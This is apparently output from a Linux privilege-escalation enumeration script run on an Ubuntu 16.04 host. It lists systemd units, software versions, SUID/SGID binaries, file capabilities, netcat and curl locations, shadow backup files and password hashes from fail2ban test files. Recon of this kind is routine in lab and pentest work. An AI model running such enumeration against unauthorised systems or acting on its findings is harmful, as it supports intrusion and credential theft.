-rw-r--r-- 1 root root  401 Feb 24  2015 ureadahead.service
-rw-r--r-- 1 root root  283 Dec 28  2014 anacron-resume.service
-rw-r--r-- 1 root root  183 Dec 28  2014 anacron.service
-rw-r--r-- 1 root root  132 Dec 11  2014 saned.socket
-rw-r--r-- 1 root root  188 Feb 24  2014 rsync.service

/lib/systemd/system/apache2.service.d:
total 4.0K
-rw-r--r-- 1 root root 42 Apr 12  2016 apache2-systemd.conf

/lib/systemd/system/display-manager.service.d:
total 4.0K
-rw-r--r-- 1 root root 110 Aug 19  2016 xdiagnose.conf

/lib/systemd/system/system-update.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Jun 18 10:03 fwupd-offline-update.service -> ../fwupd-offline-update.service

/lib/systemd/system/basic.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Jun 18 10:03 alsa-restore.service -> ../alsa-restore.service
lrwxrwxrwx 1 root root 21 Jun 18 10:03 alsa-state.service -> ../alsa-state.service

/lib/systemd/system/halt.target.wants:
total 0
lrwxrwxrwx 1 root root 24 Jun 18 10:03 plymouth-halt.service -> ../plymouth-halt.service

/lib/systemd/system/initrd-switch-root.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Jun 18 10:03 plymouth-start.service -> ../plymouth-start.service
lrwxrwxrwx 1 root root 31 Jun 18 10:03 plymouth-switch-root.service -> ../plymouth-switch-root.service

/lib/systemd/system/kexec.target.wants:
total 0
lrwxrwxrwx 1 root root 25 Jun 18 10:03 plymouth-kexec.service -> ../plymouth-kexec.service

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Jun 18 10:03 dbus.service -> ../dbus.service
lrwxrwxrwx 1 root root 15 Jun 18 10:03 getty.target -> ../getty.target
lrwxrwxrwx 1 root root 24 Jun 18 10:03 plymouth-quit.service -> ../plymouth-quit.service
lrwxrwxrwx 1 root root 29 Jun 18 10:03 plymouth-quit-wait.service -> ../plymouth-quit-wait.service
lrwxrwxrwx 1 root root 33 Jun 18 10:03 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path
lrwxrwxrwx 1 root root 25 Jun 18 10:03 systemd-logind.service -> ../systemd-logind.service
lrwxrwxrwx 1 root root 39 Jun 18 10:03 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
lrwxrwxrwx 1 root root 32 Jun 18 10:03 systemd-user-sessions.service -> ../systemd-user-sessions.service

/lib/systemd/system/poweroff.target.wants:
total 0
lrwxrwxrwx 1 root root 28 Jun 18 10:03 plymouth-poweroff.service -> ../plymouth-poweroff.service
lrwxrwxrwx 1 root root 39 Jun 18 10:03 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/reboot.target.wants:
total 0
lrwxrwxrwx 1 root root 26 Jun 18 10:03 plymouth-reboot.service -> ../plymouth-reboot.service
lrwxrwxrwx 1 root root 39 Jun 18 10:03 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 root root 24 Jun 18 10:03 console-setup.service -> ../console-setup.service
lrwxrwxrwx 1 root root 20 Jun 18 10:03 cryptsetup.target -> ../cryptsetup.target
lrwxrwxrwx 1 root root 22 Jun 18 10:03 dev-hugepages.mount -> ../dev-hugepages.mount
lrwxrwxrwx 1 root root 19 Jun 18 10:03 dev-mqueue.mount -> ../dev-mqueue.mount
lrwxrwxrwx 1 root root 25 Jun 18 10:03 keyboard-setup.service -> ../keyboard-setup.service
lrwxrwxrwx 1 root root 28 Jun 18 10:03 kmod-static-nodes.service -> ../kmod-static-nodes.service
lrwxrwxrwx 1 root root 30 Jun 18 10:03 plymouth-read-write.service -> ../plymouth-read-write.service
lrwxrwxrwx 1 root root 25 Jun 18 10:03 plymouth-start.service -> ../plymouth-start.service
lrwxrwxrwx 1 root root 36 Jun 18 10:03 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
lrwxrwxrwx 1 root root 19 Jun 18 10:03 setvtrgb.service -> ../setvtrgb.service
lrwxrwxrwx 1 root root 32 Jun 18 10:03 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
lrwxrwxrwx 1 root root 26 Jun 18 10:03 sys-kernel-config.mount -> ../sys-kernel-config.mount
lrwxrwxrwx 1 root root 25 Jun 18 10:03 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
lrwxrwxrwx 1 root root 36 Jun 18 10:03 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
lrwxrwxrwx 1 root root 25 Jun 18 10:03 systemd-binfmt.service -> ../systemd-binfmt.service
lrwxrwxrwx 1 root root 30 Jun 18 10:03 systemd-hwdb-update.service -> ../systemd-hwdb-update.service
lrwxrwxrwx 1 root root 27 Jun 18 10:03 systemd-journald.service -> ../systemd-journald.service
lrwxrwxrwx 1 root root 32 Jun 18 10:03 systemd-journal-flush.service -> ../systemd-journal-flush.service
lrwxrwxrwx 1 root root 36 Jun 18 10:03 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
lrwxrwxrwx 1 root root 31 Jun 18 10:03 systemd-modules-load.service -> ../systemd-modules-load.service
lrwxrwxrwx 1 root root 30 Jun 18 10:03 systemd-random-seed.service -> ../systemd-random-seed.service
lrwxrwxrwx 1 root root 25 Jun 18 10:03 systemd-sysctl.service -> ../systemd-sysctl.service
lrwxrwxrwx 1 root root 37 Jun 18 10:03 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
lrwxrwxrwx 1 root root 33 Jun 18 10:03 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
lrwxrwxrwx 1 root root 24 Jun 18 10:03 systemd-udevd.service -> ../systemd-udevd.service
lrwxrwxrwx 1 root root 31 Jun 18 10:03 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 root root 30 Jun 18 10:03 systemd-update-utmp.service -> ../systemd-update-utmp.service

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 14 Jun 18 10:03 dbus.socket -> ../dbus.socket
lrwxrwxrwx 1 root root 25 Jun 18 10:03 systemd-initctl.socket -> ../systemd-initctl.socket
lrwxrwxrwx 1 root root 32 Jun 18 10:03 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
lrwxrwxrwx 1 root root 34 Jun 18 10:03 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
lrwxrwxrwx 1 root root 26 Jun 18 10:03 systemd-journald.socket -> ../systemd-journald.socket
lrwxrwxrwx 1 root root 31 Jun 18 10:03 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 root root 30 Jun 18 10:03 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket

/lib/systemd/system/getty.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Jun 18 10:03 getty-static.service -> ../getty-static.service

/lib/systemd/system/graphical.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Jun 18 10:03 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/local-fs.target.wants:
total 0
lrwxrwxrwx 1 root root 29 Jun 18 10:03 systemd-remount-fs.service -> ../systemd-remount-fs.service

/lib/systemd/system/rc-local.service.d:
total 4.0K
-rw-r--r-- 1 root root 290 Nov 15  2018 debian.conf

/lib/systemd/system/rescue.target.wants:
total 0
lrwxrwxrwx 1 root root 39 Jun 18 10:03 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service

/lib/systemd/system/resolvconf.service.wants:
total 0
lrwxrwxrwx 1 root root 42 Jun 18 10:03 systemd-networkd-resolvconf-update.path -> ../systemd-networkd-resolvconf-update.path

/lib/systemd/system/sigpwr.target.wants:
total 0
lrwxrwxrwx 1 root root 36 Jun 18 10:03 sigpwr-container-shutdown.service -> ../sigpwr-container-shutdown.service

/lib/systemd/system/systemd-timesyncd.service.d:
total 4.0K
-rw-r--r-- 1 root root 251 Nov 15  2018 disable-with-time-daemon.conf

/lib/systemd/system/timers.target.wants:
total 0
lrwxrwxrwx 1 root root 31 Jun 18 10:03 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer

/lib/systemd/system/busnames.target.wants:
total 0

/lib/systemd/system/systemd-resolved.service.d:
total 4.0K
-rw-r--r-- 1 root root 200 Nov 15  2018 resolvconf.conf

/lib/systemd/system/runlevel1.target.wants:
total 0

/lib/systemd/system/runlevel2.target.wants:
total 0

/lib/systemd/system/runlevel3.target.wants:
total 0

/lib/systemd/system/runlevel4.target.wants:
total 0

/lib/systemd/system/runlevel5.target.wants:
total 0

/lib/systemd/system-generators:
total 692K
-rwxr-xr-x 1 root root  71K Feb 13  2019 systemd-cryptsetup-generator
-rwxr-xr-x 1 root root  63K Feb 13  2019 systemd-dbus1-generator
-rwxr-xr-x 1 root root  43K Feb 13  2019 systemd-debug-generator
-rwxr-xr-x 1 root root  83K Feb 13  2019 systemd-fstab-generator
-rwxr-xr-x 1 root root  43K Feb 13  2019 systemd-getty-generator
-rwxr-xr-x 1 root root 123K Feb 13  2019 systemd-gpt-auto-generator
-rwxr-xr-x 1 root root  39K Feb 13  2019 systemd-hibernate-resume-generator
-rwxr-xr-x 1 root root  43K Feb 13  2019 systemd-insserv-generator
-rwxr-xr-x 1 root root  35K Feb 13  2019 systemd-rc-local-generator
-rwxr-xr-x 1 root root  31K Feb 13  2019 systemd-system-update-generator
-rwxr-xr-x 1 root root 103K Feb 13  2019 systemd-sysv-generator
-rwxr-xr-x 1 root root  287 Oct  2  2018 friendly-recovery

/lib/systemd/system-sleep:
total 8.0K
-rwxr-xr-x 1 root root  92 Mar 17  2016 hdparm
-rwxr-xr-x 1 root root 182 Oct 26  2015 wpasupplicant

/lib/systemd/network:
total 12K
-rw-r--r-- 1 root root 404 Feb 13  2019 80-container-host0.network
-rw-r--r-- 1 root root 482 Feb 13  2019 80-container-ve.network
-rw-r--r-- 1 root root  80 Feb 13  2019 99-default.link

/lib/systemd/system-preset:
total 4.0K
-rw-r--r-- 1 root root 869 Feb 13  2019 90-systemd.preset

/lib/systemd/system-shutdown:
total 0


### SOFTWARE #############################################
[-] Sudo version:
Sudo version 1.8.16


[-] Apache version:
Server version: Apache/2.4.18 (Ubuntu)
Server built:   2016-04-15T18:00:57


[-] Apache user configuration:
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data


[-] Installed Apache modules:
Loaded Modules:
 core_module (static)
 so_module (static)
 watchdog_module (static)
 http_module (static)
 log_config_module (static)
 logio_module (static)
 version_module (static)
 unixd_module (static)
 access_compat_module (shared)
 alias_module (shared)
 auth_basic_module (shared)
 authn_core_module (shared)
 authn_file_module (shared)
 authz_core_module (shared)
 authz_host_module (shared)
 authz_user_module (shared)
 autoindex_module (shared)
 deflate_module (shared)
 dir_module (shared)
 env_module (shared)
 filter_module (shared)
 mime_module (shared)
 mpm_prefork_module (shared)
 negotiation_module (shared)
 php7_module (shared)
 setenvif_module (shared)
 status_module (shared)


[-] htpasswd found - could contain passwords:
/usr/lib/python3/dist-packages/fail2ban/tests/files/config/apache-auth/digest_wrongrelm/.htpasswd
username:wrongrelm:99cd340e1283c6d0ab34734bd47bdc30
4105bbb04
/usr/lib/python3/dist-packages/fail2ban/tests/files/config/apache-auth/basic/file/.htpasswd
username:$apr1$uUMsOjCQ$.BzXClI/B/vZKddgIAJCR.
/usr/lib/python3/dist-packages/fail2ban/tests/files/config/apache-auth/basic/authz_owner/.htpasswd
username:$apr1$1f5oQUl4$21lLXSN7xQOPtNsj5s4Nk/
/usr/lib/python3/dist-packages/fail2ban/tests/files/config/apache-auth/digest/.htpasswd
username:digest private area:fad48d3a7c63f61b5b3567a4105bbb04
/usr/lib/python3/dist-packages/fail2ban/tests/files/config/apache-auth/digest_anon/.htpasswd
username:digest anon:25e4077a9344ceb1a88f2a62c9fb60d8
05bbb04
anonymous:digest anon:faa4e5870970cf935bb9674776e6b26a
/usr/lib/python3/dist-packages/fail2ban/tests/files/config/apache-auth/digest_time/.htpasswd
username:digest private area:fad48d3a7c63f61b5b3567a4105bbb04


### INTERESTING FILES ####################################
[-] Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
/usr/bin/curl


[-] Installed compilers:
ii  g++                                        4:5.3.1-1ubuntu1                             amd64        GNU C++ compiler
ii  g++-5                                      5.4.0-6ubuntu1~16.04.11                      amd64        GNU C++ compiler
ii  gcc                                        4:5.3.1-1ubuntu1                             amd64        GNU C compiler
ii  gcc-5                                      5.4.0-6ubuntu1~16.04.11                      amd64        GNU C compiler
ii  hardening-includes                         2.7ubuntu2                                   all          Makefile for enabling compiler flags for security hardening
ii  libllvm3.8:amd64                           1:3.8-2ubuntu4                               amd64        Modular compiler and toolchain technologies, runtime library
ii  libllvm6.0:amd64                           1:6.0-1ubuntu2~16.04.1                       amd64        Modular compiler and toolchain technologies, runtime library
ii  libxkbcommon0:amd64                        0.5.0-1ubuntu2.1                             amd64        library interface to the XKB compiler - shared library


[-] Can we read/write sensitive files:
-rw-r--r-- 1 root root 2342 Jul 21 10:44 /etc/passwd
-rw-r--r-- 1 root root 996 Jul 21 10:44 /etc/group
-rw-r--r-- 1 root root 575 Oct 22  2015 /etc/profile
-rw-r----- 1 root shadow 1492 Jul 21 10:44 /etc/shadow


[-] SUID files:
-rwsr-xr-x 1 root root 40152 May 16  2018 /bin/mount
-rwsr-xr-x 1 root root 27608 May 16  2018 /bin/umount
-rwsr-xr-x 1 root root 142032 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 40128 May 16  2017 /bin/su
-rwsr-xr-x 1 root root 30800 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-- 1 root messagebus 42992 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 428240 Apr 15  2016 /usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 10584 Oct 25  2018 /usr/lib/xorg/Xorg.wrap
-rwsr-xr-x 1 root root 14864 Jan 15  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 54256 May 16  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 23376 Jan 15  2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 39904 May 16  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 49584 May 16  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 136808 Jul  4  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 75304 May 16  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40432 May 16  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 10624 May  8  2018 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-- 1 root dip 394984 Jun 12  2018 /usr/sbin/pppd


[-] SGID files:
-rwxr-sr-x 1 root utmp 10232 Mar 11  2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root mail 14336 Jul 25  2018 /usr/lib/evolution/camel-lock-helper-1.2
-rwsr-sr-x 1 root root 10584 Oct 25  2018 /usr/lib/xorg/Xorg.wrap
-rwxr-sr-x 1 root crontab 36080 Apr  5  2016 /usr/bin/crontab
-rwxr-sr-x 1 root ssh 358624 Apr 15  2016 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 14752 Mar  1  2016 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 22768 May 16  2017 /usr/bin/expiry
-rwxr-sr-x 1 root tty 27368 May 16  2018 /usr/bin/wall
-rwxr-sr-x 1 root mlocate 39520 Nov 17  2014 /usr/bin/mlocate
-rwxr-sr-x 1 root shadow 62336 May 16  2017 /usr/bin/chage
-rwxr-sr-x 1 root shadow 35600 Apr  9  2018 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 35632 Apr  9  2018 /sbin/pam_extrausers_chkpwd


[+] Files with POSIX capabilities set:
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr = cap_net_raw+ep
/usr/bin/gnome-keyring-daemon = cap_ipc_lock+ep
/usr/bin/arping = cap_net_raw+ep
/usr/bin/systemd-detect-virt = cap_dac_override,cap_sys_ptrace+ep


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[-] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 23444 Apr 28  2016 /etc/brltty.conf
-rw-r--r-- 1 root root 604 Jul  2  2015 /etc/deluser.conf
-rw-r--r-- 1 root root 1018 Oct  5  2015 /etc/usb_modeswitch.conf
-rw-r--r-- 1 root root 1371 Jan 27  2016 /etc/rsyslog.conf
-rw-r--r-- 1 root root 552 Mar 16  2016 /etc/pam.conf
-rw-r--r-- 1 root root 191 Jan 18  2016 /etc/libaudit.conf
-rw-r--r-- 1 root root 27 Jan  7  2015 /etc/libao.conf
-rw-r--r-- 1 root root 1260 Mar 16  2016 /etc/ucf.conf
-rw-r--r-- 1 root root 14867 Apr 11  2016 /etc/ltrace.conf
-rw-r--r-- 1 root root 110 Jun 18 10:05 /etc/kernel-img.conf
-rw-r--r-- 1 root root 7649 Feb 26  2019 /etc/pnm2ppa.conf
-rw-r--r-- 1 root root 10368 Oct  2  2015 /etc/sensors3.conf
-rw-r--r-- 1 root root 4781 Mar 17  2016 /etc/hdparm.conf
-rw-r--r-- 1 root root 280 Jun 19  2014 /etc/fuse.conf
-rw-r--r-- 1 root root 2084 Sep  5  2015 /etc/sysctl.conf
-rw-r--r-- 1 root root 338 Nov 17  2014 /etc/updatedb.conf
-rw-r--r-- 1 root root 34 Jan 27  2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 431 Aug 17  2018 /etc/fwupd.conf
-rw-r--r-- 1 root root 624 Aug  8  2007 /etc/mtools.conf
-rw-r--r-- 1 root root 112 Jan 10  2014 /etc/apg.conf
-rw-r--r-- 1 root root 6488 Feb 26  2019 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 2969 Nov 10  2015 /etc/debconf.conf
-rw-r--r-- 1 root root 529 Feb 26  2019 /etc/nsswitch.conf
-rw-r--r-- 1 root root 1803 Nov  6  2015 /etc/signond.conf
-rw-r--r-- 1 root root 771 Mar  6  2015 /etc/insserv.conf
-rw-r--r-- 1 root root 389 Apr 18  2016 /etc/appstream.conf
-rw-rw-r-- 1 root root 350 Jun 18 10:05 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 967 Oct 30  2015 /etc/mke2fs.conf
-rw-r--r-- 1 root root 3028 Feb 26  2019 /etc/adduser.conf
-rw-r--r-- 1 root root 703 May  5  2015 /etc/logrotate.conf
-rw-r--r-- 1 root root 92 Oct 22  2015 /etc/host.conf
-rw-r--r-- 1 root root 1308 Mar 10  2016 /etc/kerneloops.conf
-rw-r--r-- 1 root root 2584 Feb 18  2016 /etc/gai.conf


[-] Current user's history files:
---------- 1 paul paul 0 Jul 21 10:44 /home/paul/.bash_history


[-] Location and contents (if accessible) of .bash_history file(s):
/home/paul/.bash_history


[-] Location and Permissions (if accessible) of .bak file(s):
-rw-r--r-- 1 root root 2903 Jun 18 10:07 /etc/apt/sources.bak
-rw------- 1 root root 996 Jul 21 10:44 /var/backups/group.bak
-rw------- 1 root shadow 1492 Jul 21 10:44 /var/backups/shadow.bak
-rw------- 1 root root 2342 Jul 21 10:44 /var/backups/passwd.bak
-rw------- 1 root shadow 832 Jul 21 10:44 /var/backups/gshadow.bak


[-] Any interesting mail in /var/mail:
total 8
drwxrwsr-x  2 root mail 4096 Feb 26  2019 .
drwxr-xr-x 14 root root 4096 Jul 21 10:44 ..


### SCAN COMPLETE ####################################0
